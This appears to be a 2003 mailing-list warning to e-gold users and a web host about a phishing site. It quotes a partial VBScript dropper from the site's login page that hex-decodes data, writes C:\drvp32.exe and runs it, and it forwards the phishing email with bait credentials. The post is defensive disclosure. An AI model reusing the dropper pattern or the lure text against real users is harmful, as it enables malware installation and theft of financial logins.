OPEN LETTER to e-gold users and host company of potential fraud website:
e-gold users, watch out for websites that may exploit
visual basic features of MSexplorer to grab passphrases!
ATTTENTION SERVICE HOSTING WEBSITE ON 69.57.150.82
CHECK your server supporting www.hintington.com,
IP address 69.57.150.82
a suspicious forged email with hyperlinks to www.hintington.com
which tries to do a data login, maybe to take advantage
of MS web browser exploit?
Best to open with mozilla or firebird or something w/o visual
basic exploits. and afterwards make sure you don't have
c:\drvp32.exe on your harddrive
even the domain name and its registration are suspect.
hinington.com does not exist, hintington.com is
has suspicious contancts and the
spam originates from around russia area
You may want to remove this website ASAP and save any information
about its setup if needed for discovery to avoid legal issues!
Be careful, www.hintington.com/login.php
tries to launch a visual basic script,
that appears to write a program to c:\
and then run it.... scary
MOST probably to capture e-gold logins
(w/ firebird web browser it fails)
excerpt with some of the code :
<SCRIPT language=vbs>
self.MoveTo 6000,6000
b.write(H(**************
.....
.....
.....
b.Write(H(""))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:\drvp32.exe")
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
H2=H2&Chr("&h"&Mid(H1,H3,2))
Next
H=H2
End Function
</SCRIPT>
---------- Forwarded message ----------
Return-Path: <[EMAIL PROTECTED]>
Received: from Fred (du-25.ks.ukrpack.net [195.230.129.25])
by list.webengr.com (8.12.9/8.12.9) with SMTP id h7R0UMw7018612
for <[EMAIL PROTECTED]>; Wed, 27 Aug 2003 00:30:26 GMT
Message-Id: <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
From: "Fred"<[EMAIL PROTECTED]>
To: "" <[EMAIL PROTECTED]>
Subject: Private Information!
Sender: "Fred"<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type:
multipart/alternative;boundary="----=_NextPart_000_0129_01C1ACD9.F0214F00"
Date: Wed, 27 Aug 2003 03:46:01 +0300
X-Virus-Scanned: clamdscan / ClamAV version 20030720
X-Spam-Status: No, hits=3.0 required=7.0
tests=HTML_30_40,HTML_MESSAGE,HTML_WIN_OPEN,
MSG_ID_ADDED_BY_MTA_3,NO_REAL_NAME
version=2.55
X-Spam-Level: ***
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)
Hello Bob.
This is your private information:
RetroBank International
http://www.retrobank.com
Login : Bob3412
Password: R6Ji1uI
Hintington Bank
http://www.hintington.com
Login : Bob3412
Password: Ug2Kl4ty
E-gold
http://www.e-gold.com
E-gold#451287
Pass: tY72Jkw
Your money still frozen...
Fred
mailto: [EMAIL PROTECTED]
---
You are currently subscribed to e-gold-tech as: [EMAIL PROTECTED]
To unsubscribe send a blank email to [EMAIL PROTECTED]
Safe web surfing tip: Get in the habit of checking the SSL key/padlock icon in your
browser and address/location bar *before* submitting sensitive information like your
e-gold passphrase.
